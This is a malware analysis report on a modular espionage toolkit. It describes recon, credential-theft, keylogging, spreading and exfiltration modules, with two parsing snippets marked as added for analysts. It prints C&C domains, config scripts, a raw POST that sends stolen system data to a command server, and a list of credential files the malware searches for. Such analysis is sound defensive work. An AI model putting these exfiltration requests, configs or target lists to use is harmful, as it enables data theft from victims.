- Extract Outlook account information
- Determine the external IP address of the infected machine
- Download files from FTP servers that are reachable from the infected machine (including those that are connected to its local network) using previously obtained credentials
- Write and/or execute arbitrary code provided within the task
- Perform a network scan, dump configuration data from Cisco devices if available
- Perform a network scan within a predefined range and replicate to vulnerable machines using the MS08-067 vulnerability
- Replicate via the network using previously obtained administrative credentials

Module Groups

Group name  Description

Recon
Modules of this group are designed to be used during the first stage of the cyberattack, right after initial infiltration. Their main purpose is to collect general information about the target system, which helps locate and identify the infected machine, estimate the potential value of the data on the computer and decide which other modules should be pushed next. These modules also collect initial, easy-to-get information such as browser history, browser-cached credentials and FTP client settings.

Password
This group of modules is designed to steal credentials from various applications and resources, from Mail.ru Agent (a popular free app from mail.ru) to MS Outlook credentials and Windows account hashes (including cached Windows domain account hashes). Capable of using low-level, direct disk access to copy protected files.

Email
This group steals emails from local MS Outlook storage or from remote POP3/IMAP mail servers. It is capable of dumping full email bodies with headers and saving attachments with predefined file extensions.

USB drive
This group is used to steal files from attached USB devices. It monitors USB device events and starts every time a new device is attached. It can copy files by a predefined extension list, size and age. This group is capable of recognising, restoring and copying already deleted files in MS Office document formats using its own FAT-based filesystem parser.

Keyboard
This group is dedicated to recording keystrokes, grabbing text from password input fields and making screen captures.

Persistence
This group contains installer and payload code to plant a plugin in popular applications such as MS Office or Adobe Reader. The backdoor code is activated when a specially crafted document is opened on the target machine. This is used to regain lost access to a machine in case of an unexpected loss of control (C&C server takedown or local malware cleaning).

Spreading
Modules of this group are used to scan for other hosts on the network, fingerprint them and then infect them via MS08-067 or a list of stolen admin credentials. A module from this group is capable of dumping Cisco network router configuration via SNMP commands and an embedded TFTP server.

Mobile
The Mobile group is used to dump all valuable information from a locally attached mobile device. It is capable of copying contact information, calendars, SMS and email databases and much other private data. These modules are capable of checking whether a device has been jailbroken.

Exfiltration
While some of the other modules work in “offline” mode, collecting and storing data locally, this group of modules transfers all collected data to the C&C server. Modules of this group are capable of reaching FTP servers, remote network shares and local disk drives and copying files from these resources. Unlike the Recon data collection modules, these modules are designed to run repeatedly and bring back only new valuable data.

Missing Modules

Group name  Description

USB Infection
There are modules that copy data files (such as execution logs) related to the current malware family from USB drives. However, we have not yet seen a module that infects USB drives. We suspect that such a module is capable of infecting removable storage, running arbitrary modules from other groups and saving data back to the USB drives.

Module comparison table


2. Recon group

RegConn module

Known variants:

MD5 Size Compilation date (payload)

5447848f3a5fdaf97c498190ed501620 167,936 bytes October 22nd, 2011

Summary

Gathers system-related information: records installed and recently run software and the related application launch timestamps, enumerates attached USB devices such as mobile phones and looks for software for these devices, checks for the presence of custom enterprise software, maintains unfinished/unreferenced download+execute functionality, and sends the encrypted collected data to one of the C&C servers (i.e. nt-windows-online.com; nt-windows-update.com; nt-windows-check.com).

This module is a Win32 DLL file. The C runtime and several other libraries are statically linked into the executable with various optimizations enabled. All functionality is in the DllMain function; no export names are defined. Compiled with MS Visual C++ 2005.

Sequence of system monitoring tasks

1. Gathers startup information and selected environment variables and values (%windir%, %username%, %userdomain%, %computername%)


2. Opens the target directory c:\windows\prefetch and records all entries in the directory for recently run applications along with their timestamps, i.e.

PREFETCH DEFRAG.EXE-273F131E.pf.2012-10-31 18:32:37
PREFETCH DUMPBIN.EXE-0751B17C.pf.2012-11-01 23:45:39

Loops through the registry and attempts to access and record all recently used application data, i.e.

C:\Program Files\Common Files\Java\Java Update\jusched.exe, REG_SZ, Java(TM) Update Scheduler

C:\Documents and Settings\p\Local Settings\Application Data\Google\Update\GoogleUpdate.exe, REG_SZ, Google Installer

C:\Program Files\Messenger\msmsgs.exe, REG_SZ, Windows Messenger

Attempts to access and record a set of hardcoded registry keys related to enterprise software, along with related keys and values. Reports on the success and failure of related key and value access, i.e.

REG ORACLE* CHECK
(1) Software\Oracle\SunRay\ClientInfoAgent\DisconnectActions\@Default -> REG_SZ: ""
(1) Software\Oracle\Sun Ray\ClientInfoAgent\ReconnectActions\@Default -> REG_SZ: ""

Attempts to access and record all registry keys and values related to context menu handlers and the related executable pathnames, i.e.

Context MENU *\shellex\ContextMenuHandlers\7-Zip
(1) *\shellex\ContextMenuHandlers\7-Zip\@Default -> REG_SZ: "{23170F69-40C1-278A-1000-000100020000}"
(1) CLSID\{23170F69-40C1-278A-1000-000100020000}\@Default -> REG_SZ: "7-Zip Shell Extension"
(1) CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\@Default -> REG_SZ: "C:\Program Files\7-Zip\7-zip.dll"
(2) CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel -> REG_SZ: "Apartment"

Attempts to access and record registry keys and values related to auto-start applications enumerated under the HKCU Run key and all HKLM Userinit registry keys, i.e.

HKCU Run
(1) SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VBoxTray -> REG_SZ: "C:\WINDOWS\system32\VBoxTray.exe"
(2) SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SunJavaUpdateSched -> REG_SZ: "C:\Program Files\Common Files\Java\Java Update\jusched.exe"

Attempts to access and record registry keys and values enabling email and webmail access under HKCU\Software\VB and VBA Program Settings\Webmailer, the MS Office settings, and HKCU\Software\Mail.ru\Agent\Agent, i.e.

REG_MRA Run
(1) Software\Mail.Ru\Agent\Agent -> REG_SZ: "1"

Attempts to access and record registry keys and values related to a hardcoded list of attached mobile devices, general USB devices, and mobile synchronization and contact software. Reports on the success and failure of related key and value access, i.e.

N2 Run
ERROR: can't make RegOpenKey for Software\Nokia\PC Suite at 412: 0
MSG: The operation completed successfully


Attempts to access and record registry keys and values related to the list of all installed software. Reports on the success and failure of related key and value access, i.e.

REG_SPEC_SSS_B Run
(1) SOFTWARE\Classes\Installer\Products\0B79C053C7D38MEE4AB9A00CB3B5D2472\ProductName -> REG_SZ: "WebFldrs XP"

Attempts to access and record registry keys and values indicating the presence of the Radmin v2.0 remote control software, i.e.

Radmin Run
ERROR: can't make RegOpenKey for SYSTEM\RAdmin\v2.0\Server\Parameters at 412: 0
MSG: The operation completed successfully

Attempts to open the Firefox prefs.js and profiles.ini configuration files and the Opera profile.ini and profile/Opera6.ini configuration files. Reads these files and identifies the network proxies for each, along with credential information. Retrieves the Internet Explorer proxy preferences from the registry.

Searches the registry for the following file types and their corresponding handlers and attempts to record the related data for the following extensions:

.str .tte ._ok .ki .tel .tlg .zfc .encrypted .zm9 .dat .crp .pcr .safe .ldf

As part of the network activity loop, calls GetWindowsDirectoryA, GetDriveTypeA and GetVolumeInformation each time and collects hardware information, most likely for unique identification. Attempts to resolve the nt-windows-update.com domain name.

Following a successful call to and return from WS2_32.WSAStartup, and prior to WS2_32.gethostbyname, the collected data is encrypted.

Attempts to connect to nt-windows-online.com and POSTs the encrypted data to nt-windows-online.com/cgi-bin/nt/sk/. If the POST to nt-windows-online.com fails, attempts the same process with the nt-windows-check.com and nt-windows-update.com domains. If no connections are made, attempts to use the configured web browser proxy settings to connect to the three hard-coded domains listed above. Connects and POSTs the stolen configuration data.

Maintains download-and-execute code. How this functionality is called at runtime is uncertain: there are no references to it at runtime, so it seems that something is missing or unfinished.

Hardcoded registry keys:

HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache
HKLM\Software\Oracle
HKCU\Software\CIT
HKCU\Software\CIT Software
HKLM\Software
HKLM\Software\Baw
HKLM\Software\Baw2
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKCR\*\shellex\ContextMenuHandlers
HKCR\CLSID\
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
HKCU\SOFTWARE\VB and VBA Program Settings\WebMailer
HKCU\Software\Microsoft\Office\12.0\Common\General
HKCU\Software\Mail.Ru\Agent
HKLM\SOFTWARE\Classes\Installer\Products
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup
HKCU\SOFTWARE\Microsoft\Windows CE Services
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
HKLM\Software\Nokia
HKLM\Software\HTC\
HKLM\System\CurrentControlSet\Control\DeviceClasses
HKCR\SonyEricsson.PCCompanion.1\CLSID
HKLM\System\ControlSet001\Enum\Root\WPD\0000
HKLM\SYSTEM\CURRENTCONTROLSET\ENUM\USB
HKLM\SYSTEM\RAdmin\

Wnhttp module

Known variants:

MD5 Compilation date (payload)

1b840c5b45cd015f51010e12938b528a 2012.09.05 07:02:33 (GMT)

65820769534fec10958573d1c8a545a8 2012.09.05 07:02:33 (GMT)

Summary

The file is a PE DLL without exported functions, compiled with Microsoft Visual Studio 2010. Known samples share one code section, but contain different payloads in the resource section. All the functionality is implemented in the DllMain function.

This module is a plugin that checks Internet connectivity and obtains the external IP address of the current system using popular public services such as 2ip.ru, myip.ru and smart-ip.net.

DllMain

The module collects basic system information such as the current computer name, the current username, and the path to the original executable module it was started from. It creates a unique identifier of the current system based on the VolumeSerialNumber property of the disk where the current Windows system is located, or on a hash of the current computer name and the Internet Explorer ProductID value from HKLM\SOFTWARE\Microsoft\Internet Explorer\Registration\ProductID. This information is written at the beginning of the log file, along with the current date and time.

This module loads a config/script from the local resource AAA and sends out network requests using the standard WinInet API. The config/script AAA has the following contents:

SetOption(conn_a.D_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")
SetOption(conn_a.D_NAME, [15] "/cgi-bin/nt/sk")
SetOption(conn_a.D_RPRT, [3] "80")
SetOption(conn_a.D_SPRT, [3] "80")
SetOption(conn_a.D_USER, [21] "%removed%")
SetOption(conn_a.D_MODE, 0x0033)
SetOption(conn_a.D_PASS, 0x00)
SetOption(conn_a.J_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")
SetOption(conn_a.J_NAME, [15] "/cgi-bin/nt/th")
SetOption(conn_a.J_USER, [21] "%removed%")
SetOption(conn_a.J_RPRT, [3] "80")
SetOption(conn_a.J_SPRT, [3] "80")
SetOption(conn_a.J_MODE, 0x0033)
SetOption(conn_a.J_PASS, 0x00)
SetOption(conn_a.VERSION_ID, [6] "51070")
SetOption(conn_a.SEND_DELAY_TIME, [6] "20000")
SetOption(conn_a.VER_SESSION_ID, [11] "%removed%")
SetOption(http_host, [7] "2ip.ru")
SetOption(http_port, [3] "80")
SetOption(http_path, 0x002F)
SetOption(http_ua, [68] "Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1")
SetOption(http_headers, [177] "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Accept-Charset: utf-8;q=0.7,*;q=0.7")
Call(task_http)
SetOption(http_host, [12] "www.myip.ru")
SetOption(http_port, [3] "80")
SetOption(http_path, 0x002F)
SetOption(http_ua, [68] "Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1")
SetOption(http_headers, [177] "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Accept-Charset: utf-8;q=0.7,*;q=0.7")
Call(task_http)
SetOption(http_host, [13] "smart-ip.net")
SetOption(http_port, [3] "80")
SetOption(http_path, 0x002F)
SetOption(http_ua, [68] "Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1")
SetOption(http_headers, [177] "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Accept-Charset: utf-8;q=0.7,*;q=0.7")
Call(task_http)

While the “conn_a” parameters are used to access the C&C server during the reporting stage, the parameters starting with "http_" are used to send out HTTP requests. The target hosts, as shown above, are

1. 2ip.ru
2. www.myip.ru
3. smart-ip.net

The websites are used to get the current IP address as it is visible on the Internet. If the machine is behind a proxy or NAT router, this IP address may differ from the local one. Interestingly, all the websites chosen by the module developers are obviously owned by Russian-speaking people from former CIS countries: the first two seem to be Russian and the last one Ukrainian.

The module simply sends HTTP GET requests to the root page of each website and gets the response code from the headers as well as the HTML/text source of the page, which is later uploaded to the C&C.

The current module doesn't create any local logs; instead all information is kept in memory, which is later compressed using Zlib 1.2.5, encrypted, encoded with the Base64 algorithm and submitted to the C&C server.

Sysinfo module


Known variants:

MD5 Compilation date

e36b94cd608e3dfdf82b4e64d1e40681 2012.09.05 09:02:30 (GMT)

a2fe73d01fd766584a0c54c971a0448a 2012.09.05 09:02:30 (GMT)

The files differ only by a few values in the resource section (which contains configuration data); the code is identical.

This module is a PE DLL, written in C++, compiled with Microsoft Visual Studio 2010.

DLL resides only in memory – it does not drop itself or any other executables to the disk.

It creates the file %USERPROFILE%\Local Settings\Temp\tmpXX.tmp (where XX is a randomly generated hex number). During the analysis, the file stayed 0 bytes. Most probably, it is created for further data logs.

The DLL collects a range of information about the computer (including the browsers' history). This data is written to memory, compressed with the Zlib deflate() function – which also performs some XOR operations on it – encoded with the base64 algorithm and sent by an HTTP POST request to the C&C server.

Initialization

After it is loaded into memory, the malware loads and locks the resource BBB:AAA:0000, which contains config information;

It gets the following information about the local system and the current process:

computer name
user name
current module name
pid

Then it creates a separate thread, which contains the main module functionality.

Main malware thread

First, it constructs an internal filename string "@INFO\SYSINFO_%u_%s.bin"

where %u is equal to 7 and %s is the system time – obtained using GetLocalTime and SystemTimeToFileTime – in the format:

"%04u%02u%02u_%02u%02u%02u_%03u"

If FileTimeToSystemTime fails, it uses the default time string:

"16010101_000000_000"

If wsprintfW fails, it uses the default hardcoded filename:

"@INFO\SYSINFO_X_00000000_000000_000.txt"

Then it reads the configuration from the resource section and builds a structure containing all the necessary information at specific offsets. This structure is held only in memory.

It contains a resource named “AAA” with the following values in it:

SetOption(conn_a.D_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")
SetOption(conn_a.D_NAME, [15] "/cgi-bin/nt/sk")
SetOption(conn_a.D_RPRT, [3] "80")
SetOption(conn_a.D_SPRT, [3] "80")
SetOption(conn_a.D_USER, [21] "%removed%")
SetOption(conn_a.D_MODE, 0x0033)
SetOption(conn_a.D_PASS, 0x00)
SetOption(conn_a.J_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")
SetOption(conn_a.J_NAME, [15] "/cgi-bin/nt/th")
SetOption(conn_a.J_USER, [21] "%removed%")
SetOption(conn_a.J_RPRT, [3] "80")
SetOption(conn_a.J_SPRT, [3] "80")
SetOption(conn_a.J_MODE, 0x0033)
SetOption(conn_a.J_PASS, 0x00)
SetOption(conn_a.VERSION_ID, [6] "17486")
SetOption(conn_a.SEND_DELAY_TIME, [6] "20000")
SetOption(conn_a.VER_SESSION_ID, [11] "%removed%")
Call(task_sysinfo)

The malware main thread calls 2 main subroutines:

1. retrieves a lot of system information, including browsing history, and writes it to the in-memory log
2. takes data from the configuration in the resources to connect to the C&C and submit the collected data

Data collection

The malware collects the following information:

current file time
local time
username
computer name
is admin (if the user has administrative rights)
language
ANSI code page
OEM code page
time zone
current module name
current directory
temp directory path
Windows directory path
system directory path
major OS version
minor OS version
build number
service pack number
platform id

Additionally, to obtain the default applications for HTTP, HTTPS, HTMLFILE and MAILTO, the malware uses RegQueryValueEx to check the following registry keys:

HKCR\ttp\shell\open\command
HKCR\https\shell\open\command
HKCR\htmfile\shell\open\command
HKCR\mailto\shell\open\command


The following parameters are retrieved for each disk, including optical drives and shared mounts:

root path
filesystem name
volume name
drive type
volume serial number
filesystem flags
maximum component length
sectors per cluster
bytes per sector
number of free clusters
number of total clusters
free bytes available
total number of bytes
total number of free bytes

Then it collects information about local network adapters:

Adapter Name
Adapter Description
Address Length
Adapter MAC Address
Adapter Index
Adapter Type
DhcpEnabled
CurrentIpAddress
IpAddressList
GatewayList
DhcpServer
HaveWins
PrimaryWinsServer
SecondaryWinsServer
LeaseObtained
LeaseExpires

The malware looks for URL history from the following browsers:

Chrome, Mozilla Firefox, Internet Explorer, Opera

1. Chrome history:

Before the malware performs the SQL queries on the browser profile files, it copies the original file into a temp file.

To get the temp file path and name it uses GetTempPathW and GetTempFileNameW with the prefix "tmp".

The temp file will be named like this:

tmpXX.tmp

Where XX is a 2-digit number starting from 00.


The malware uses the following SQL query:

SELECT * FROM urls

to extract URLs (with titles, last visited date) from Chrome history database:

\Google\Chrome\User Data\Default\History

2. Mozilla history (sub_10015430):

The malware uses the following SQL query:

SELECT * FROM moz_places

to extract URLs from Mozilla history database:

\Mozilla\Firefox\Profiles\%profilename%\places.sqlite

In both cases, the malware performs SQL-related actions using functions from an embedded SQL library (most probably parts of sqlite3.dll).

3. IE history (sub_10014F50):

The malware calls the CoCreateInstance function with the following values:

CLSID 3C374A40-BAE4-11CF-BF7D-00AA006946EE Microsoft Url History Service
RIID AFA0DC11-C313-11D0-831A-00C04FD5AE38 SID_IUrlHistoryStg2

i.e. it uses the IUrlHistory interface to search through the history and calls SHDOCVW!CEnumSTATURL to enumerate URLs.

It also makes use of shdocvw.dll, which is responsible for controlling IE. The call addresses are resolved dynamically:


4. Opera history (sub_10014EB0):

The malware gets the Opera folder path and searches it for URLs in the files:

global_history.dat, global.dat

All the above subroutines retrieve URL + Title + Last Visited Time and write them to memory (after the previous data).

Also, a DNS resolve is performed on all domain names.

This module also calls GetEnvironmentStrings to retrieve all environment variables.

It is also interested in current Windows domain information:

DomainControllerName
DomainControllerAddress
DomainControllerAddressType
DomainGuid
DomainName
DnsForestName
Flags
DcSiteName
ClientSiteName

The malware looks for all running processes and all modules loaded into their address space. For each file it retrieves the following values from the version info:


\StringFileInfo\%04x%04x\SpecialBuild
\StringFileInfo\%04x%04x\PrivateBuild
\StringFileInfo\%04x%04x\ProductVersion
\StringFileInfo\%04x%04x\ProductName
\StringFileInfo\%04x%04x\OriginalFilename
\StringFileInfo\%04x%04x\LegalTrademarks
\StringFileInfo\%04x%04x\LegalCopyright
\StringFileInfo\%04x%04x\InternalName
\StringFileInfo\%04x%04x\FileVersion
\StringFileInfo\%04x%04x\FileDescription
\StringFileInfo\%04x%04x\CompanyName

It looks for installed programs information by enumerating the registry key:

SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

For each entry it retrieves the following values:

DisplayName
DislayVersion
DisplayIcon
InstallDate
UninstallString
InstallSource
InstallLocation

It retrieves information about installed USB devices.

Class GUID is hardcoded and equals:

{A5DCBF10-6530-11D2-901F-00C04FB951ED} → GUID_DEVINTERFACE_USB_DEVICE

The malware checks the registry for proxy settings and, if present, extracts the proxy address (into some struct or class in memory):

[HKLM|HKCU]

\Software\Microsoft\Windows\CurrentVersion\Internet Settings@ProxyServer

\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings@ProxyServer

It also checks the registry for the value MapMenuConfigGrps (not sure what that is), extracts the data and writes it somewhere:

[HKLM|HKCU]

\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced@MapMenuConfigGrps

\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Advanced@MapMenuConfigGrps

It checks Opera config files for proxy server and other server settings.

In files opera6.ini or operaprefs.ini it looks for the following strings:

SOCKS server


WAIS server

Gopher server

FTP server

HTTP server

HTTPS server

In file prefs.js it looks for strings:

user_pref("network.proxy.socks"

user_pref("network.proxy.socks_port"

user_pref("network.proxy.ftp"

user_pref("network.proxy.ftp_port"

user_pref("network.proxy.ssl"

user_pref("network.proxy.ssl_port"

user_pref("network.proxy.http"

user_pref("network.proxy.http_port"

Then the malware compresses the information stored in memory using the ZLib library and encrypts it with a custom algorithm.

Then it connects to the C&C server defined in the AAA config and sends a POST request containing the compressed, XORed and base64-encoded data:

POST http://nt-windows-online.com:80/cgi-bin/nt/sk HTTP/1.0

Host: nt-windows-online.com:80

Pragma: no-cache

Cache-Control: no-cache

Content-length: 29276

Content-Type: application/x-www-form-urlencoded

Data format

The malware collects the data in memory allocated on the heap. The memory chunk with the prepared data starts with the magic number (4E 44 00 00), followed by the filename as a Unicode string (@INFO\SYSINFO_%u_%s.bin) and the size of the data.


After the size value comes the actual information part. This part is compressed and encrypted/encoded and sent via the POST request. Data in this part is structured in the same order as it was retrieved (so first comes the system info, then disk info, network adapters, URL history, etc.). All strings are Unicode – with the exception of browsing info, which is encoded in ANSI.
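As an added illustration (not code from the report), the following Python reconstructs the chunk header just described and parses it back, so an analyst who recovers such a buffer from memory can check the magic, pull out the filename and declared size, and spot the fallback timestamp that indicates FileTimeToSystemTime failed. The report does not state the filename encoding or the width of the size field; the example assumes a NUL-terminated UTF-16LE string and a 32-bit little-endian size, and the sample chunk is constructed.

```python
import re
import struct

MAGIC = b"\x4E\x44\x00\x00"            # magic number given in the report
DEFAULT_TIME = "16010101_000000_000"   # fallback used when FileTimeToSystemTime fails
# filename pattern from the report: @INFO\SYSINFO_%u_%s.bin
NAME_RE = re.compile(r"^@INFO\\SYSINFO_(?P<id>\d+)_(?P<ts>\d{8}_\d{6}_\d{3})\.bin$")


def build_chunk(filename: str, info: bytes) -> bytes:
    """Constructed sample builder. Assumed encoding: NUL-terminated UTF-16LE
    filename followed by a 32-bit little-endian size field."""
    return (MAGIC + filename.encode("utf-16-le") + b"\x00\x00"
            + struct.pack("<I", len(info)) + info)


def parse_chunk(chunk: bytes) -> dict:
    """Parse a SYSINFO memory chunk header and return its fields."""
    if chunk[:4] != MAGIC:
        raise ValueError("not a SYSINFO chunk: bad magic")
    # scan for the 2-byte terminator on an even (UTF-16 code unit) boundary
    pos = 4
    while pos + 2 <= len(chunk) and chunk[pos:pos + 2] != b"\x00\x00":
        pos += 2
    if pos + 6 > len(chunk):
        raise ValueError("truncated: no filename terminator or size field")
    name = chunk[4:pos].decode("utf-16-le")
    (size,) = struct.unpack_from("<I", chunk, pos + 2)
    info = chunk[pos + 6:pos + 6 + size]
    m = NAME_RE.match(name)
    return {
        "filename": name,
        "module_id": int(m.group("id")) if m else None,     # 7 for the Sysinfo module
        "timestamp": m.group("ts") if m else None,
        "time_failed": bool(m) and m.group("ts") == DEFAULT_TIME,
        "declared_size": size,
        "truncated": len(info) < size,   # buffer cut short of the declared size
        "info": info,                    # still compressed/encrypted at this layer
    }


if __name__ == "__main__":
    sample = build_chunk("@INFO\\SYSINFO_7_20120905_070233_123.bin", b"constructed sysinfo payload")
    print(parse_chunk(sample))
```

The parser deliberately stops at the header: the information part is the Zlib/XOR/Base64 stage described above, so what follows the size field is opaque until that layer has been reversed.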

GetWebFtp module

Known variants:

MD5 Compilation date (payload)

d1699431d56a690e1b84aa8dddffd28f 2012.10.22 07:05:01 (GMT)

The file is a PE DLL file, compiled with Microsoft Visual Studio 2005. No functions are exported.

Network function

All the requests to a CnC server are of the following pattern:

POST http://%CnC%/cgi-bin/nt/sk HTTP/1.1
Host: %CnC%
Connection: close
Content-Length: %d\r\n\r\nDATA

The POST data is of the following structure:

Number1 + HexString + "\r\nSubject: %s\r\n\r\n" + Buffer

Number1 is a 16-byte value that depends on the VolumeSerialNumber, the computer name and the “ProductID” key in HKLM\SOFTWARE\Microsoft\Internet Explorer\Registration

Buffer is compressed with Zlib, encrypted with a modified PKZIP stream cipher, and then it is Base64-encoded.

The list of the CnCs: nt-windows-online.com;nt-windows-update.com;nt-windows-check.com

After resolving the CnC domain, the module tries to send the POST request directly.

It always expects the server to return the “500” error code («Internal Server Error») to all the requests. If this error code is actually received then the function returns success, and no further actions are taken in the network function.

If the first sending-receiving routine returns failure, the module tries to find a proxy server and connect to it. For that purpose it retrieves the path to a browser from the registry:


HKLM\SOFTWARE\Classes\HTTP\shell\open\command

If the browser is Internet Explorer, it checks the following keys:

HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable

HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyServer

If the browser is Firefox, it reads the file %APPDATA%\Mozilla\Firefox\profiles.ini and retrieves its “Path” value. After that it reads %APPDATA%\Mozilla\Firefox\%Path%\prefs.js and retrieves the proxy and port from the settings starting with “user_pref(network.proxy.*”.

If the browser is Opera, it reads the file %APPDATA%\Opera\Opera\profile\opera6.ini, finds the [Proxy] section, finds the string matching “HTTP.*=.*:.*” and retrieves the server and port from it.

DllMain

Tries to call the RegisterServiceProcess API from kernel32.dll (this API existed in Windows 9x).

Sends a POST request with the Subject: “Reflebt” and a “===” Buffer.

Starts searching for specific files on the following drives: (c:,d:,e:,f:,g:)

The list of files of interest:

"*.odu"

"*.pfx"

"Favorites.dat"

"FileZilla.xml"

"History.dat"

"Quick.dat"

"RushSite.xml"

"ScribeOptions.xml"

"Sites.dat"

"Sites.xml"

"SmartFTP*"

"TheBee.ini"

"account.cfn"

"account.xml"

"accounts.ini"

"addrbk.dat"

"andrq.ini"


"bpftp.dat"

"clients.dat"

"digsby.dat"

"ftplist.txt"

"global.xml"

"keychain.plist"

"signons.txt"

"sm.dat"

"smdata.dat"

"users.txt"

"wand.dat"

"wcx_ftp.ini"

"ws_ftp.ini"

The module also enumerates network shares. The initial purpose of that seems to be searching for the same files on the network shares, but there is a bug in the code which prevents it from doing so: the FindFirstFile API call doesn’t get a string with wildcards as its first parameter, it only gets the string of the network share without a wildcard appended, so the API always returns INVALID_HANDLE_VALUE.

If any of these files is found, the module adds its information to a Buffer for the POST request, which contains the following: file path, file contents, file creation time, last access time, last write time (all in system time format), file size, the current position in the stream, and the number of bytes read from the file. The final Buffer can contain information about several files at once. The non-compressed Buffer size can’t exceed a definite value (a little more than 358571 bytes), and files can be partially sent.

The POST request with files is sent with the Subject: “Reflect”.

After all the files are processed, the module sends the final POST request with the Subject: “Refleet” and a “===” Buffer.
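The POST body layout described under "Network function" above (Number1 + HexString + "\r\nSubject: %s\r\n\r\n" + Buffer) together with the three Subject values just listed gives enough structure to triage captured GetWebFtp traffic. The Python below is an added example, not code from the report: it splits a body into its fields, maps the Subject to the phase the report associates with it, recognises the "===" marker, and Base64-decodes the Buffer (which remains Zlib-compressed and cipher-encrypted; the example does not attempt that layer). The phase mapping, the 16-byte Number1 width and the sample bodies are taken from or constructed for this example.

```python
import base64
import binascii

SEP = b"\r\nSubject: "
# Subject values named in the report and the phase the text associates with each
SUBJECT_PHASES = {
    "Reflebt": "session start (empty === buffer)",
    "Reflect": "file contents",
    "Refleet": "session end (empty === buffer)",
}


def encode_buffer(raw: bytes) -> bytes:
    """Last encoding stage from the report (Base64); used here to build samples."""
    return base64.b64encode(raw)


def build_body(number1: bytes, hexstring: str, subject: str, buffer: bytes) -> bytes:
    """Constructed sample builder following the layout from the report."""
    if len(number1) != 16:
        raise ValueError("Number1 is a 16-byte value")
    return number1 + hexstring.encode("ascii") + SEP + subject.encode("ascii") + b"\r\n\r\n" + buffer


def parse_body(body: bytes) -> dict:
    """Split a captured GetWebFtp POST body into its fields.
    Raises ValueError when the layout does not fit."""
    if len(body) < 16:
        raise ValueError("body shorter than the 16-byte Number1 field")
    idx = body.find(SEP, 16)
    if idx < 0:
        raise ValueError("no '\\r\\nSubject: ' separator")
    end = body.find(b"\r\n\r\n", idx + len(SEP))
    if end < 0:
        raise ValueError("Subject line not terminated")
    hexstring = body[16:idx]
    subject = body[idx + len(SEP):end].decode("ascii", "replace")
    buffer = body[end + 4:]
    if buffer == b"===":
        payload = None          # the report's '===' marker: no file data in this request
    else:
        try:
            payload = base64.b64decode(buffer, validate=True)   # still Zlib + cipher, not plaintext
        except binascii.Error:
            payload = None
    return {
        "number1": body[:16],
        "hexstring": hexstring,
        "hexstring_is_hex": len(hexstring) > 0
        and all(c in b"0123456789abcdefABCDEF" for c in hexstring),
        "subject": subject,
        "phase": SUBJECT_PHASES.get(subject, "unknown"),
        "empty_marker": buffer == b"===",
        "payload": payload,
    }


if __name__ == "__main__":
    sample = build_body(bytes(range(16)), "0a1b2c", "Reflebt", b"===")   # constructed
    print(parse_body(sample))
```

A body whose Subject is one of the three known values but whose Buffer fails Base64 validation is worth a second look: the report describes the Buffer as always Base64-encoded, so a malformed one either is not this module or has been altered in transit.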

AuthInfo Module

Known variants:

MD5 Compilation date (payload)

793c82efc65a43ed249a45ec7c69a388 2012.09.05 07:02:18 (GMT)

428de53f1a1eaa040847b6456b7e5369 2012.09.05 07:02:18 (GMT)

Summary

The file is a PE DLL file, compiled with Microsoft Visual Studio 2010. No functions are exported. Its main purpose is to steal credential information from various popular file managers, email clients, browsers and FTP client software.

DllMain function

When loaded, the module retrieves its resource of type “BBB” and name “AAA”, and starts an internal plugin framework. The main function of the module is named “task_authinfo” and is registered in the framework. Then, it starts the framework main loop, effectively parsing the resource data and executing the list of actions encoded in the resource.

The decoded resource data for the known sample can be represented as the following script:

SetOption(conn_a.D_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")

SetOption(conn_a.D_NAME, [15] "/cgi-bin/nt/sk")

SetOption(conn_a.D_RPRT, [3] "80")

SetOption(conn_a.D_SPRT, [3] "80")

SetOption(conn_a.D_USER, [21] "%removed%")

SetOption(conn_a.D_MODE, 0x0033)

SetOption(conn_a.D_PASS, 0x00)

SetOption(conn_a.J_CONN, [65] "nt-windows-online.com;nt-windows-update.com;nt-windows-check.com")

SetOption(conn_a.J_NAME, [15] "/cgi-bin/nt/th")

SetOption(conn_a.J_USER, [21] "%removed%")

SetOption(conn_a.J_RPRT, [3] "80")

SetOption(conn_a.J_SPRT, [3] "80")

SetOption(conn_a.J_MODE, 0x0033)

SetOption(conn_a.J_PASS, 0x00)

SetOption(conn_a.VERSION_ID, [6] "51070")

SetOption(conn_a.SEND_DELAY_TIME, [6] "20000")

SetOption(conn_a.VER_SESSION_ID, [11] "%removed%")

Call(task_authinfo)

The module creates two output buffers (let's call them Buffer1 and Buffer2).

Buffer1 starts with the following string: "@INFO\AUTHINFO_%u_%s.txt"

